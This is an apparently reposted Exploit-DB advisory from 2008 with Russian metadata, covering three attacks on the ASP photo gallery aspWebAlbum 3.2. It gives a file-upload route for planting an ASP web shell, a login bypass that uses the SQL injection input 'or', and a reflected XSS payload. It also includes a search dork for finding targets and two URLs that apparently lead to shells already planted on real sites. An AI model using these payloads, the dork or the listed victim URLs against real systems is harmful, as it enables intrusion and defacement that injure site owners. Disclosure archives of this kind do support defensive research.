- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6420
- Проверка EDB
-
- Пройдено
- Автор
- E.WIZZ!
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2008-6978 cve-2008-6977 cve-2004-1553
- Дата публикации
- 2008-09-10
Код:
#################################################################################################
#
#-# Discovered by Alemin_Krali #
#
#-# aspWebAlbum 3.2 #
#
#-# Script Download "http://www.fullrevolution.com" #
#
#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) #
#
#-# HomePage al3m.blogspot.com #
#
#-# [email protected] #
#
#-# Dork ? : album.asp?pic= .jpg cat= #
#
#
#
#--# 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] #
#
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! #
#
and your shell adress: #
#
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp #
#
#
ex:1 #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp #
#
ex:2 #
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/ #
Ablaze rally 9-24-06/pics/klasvayv.asp #
#
#
#--# 2-Admin Bypass [AspWebAlbum 3.2] #
#
#
http://site.com/path/album.asp?action=login #
#
ASP/MS SQL Server login syntax #
#
Username:'or' #
Password:anything #
#
#
#--# 3-Xss Vulnerability [AspWebAlbum 3.2] #
#
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
#
##################################################################################################
# milw0rm.com [2008-09-10]- Источник
- www.exploit-db.com
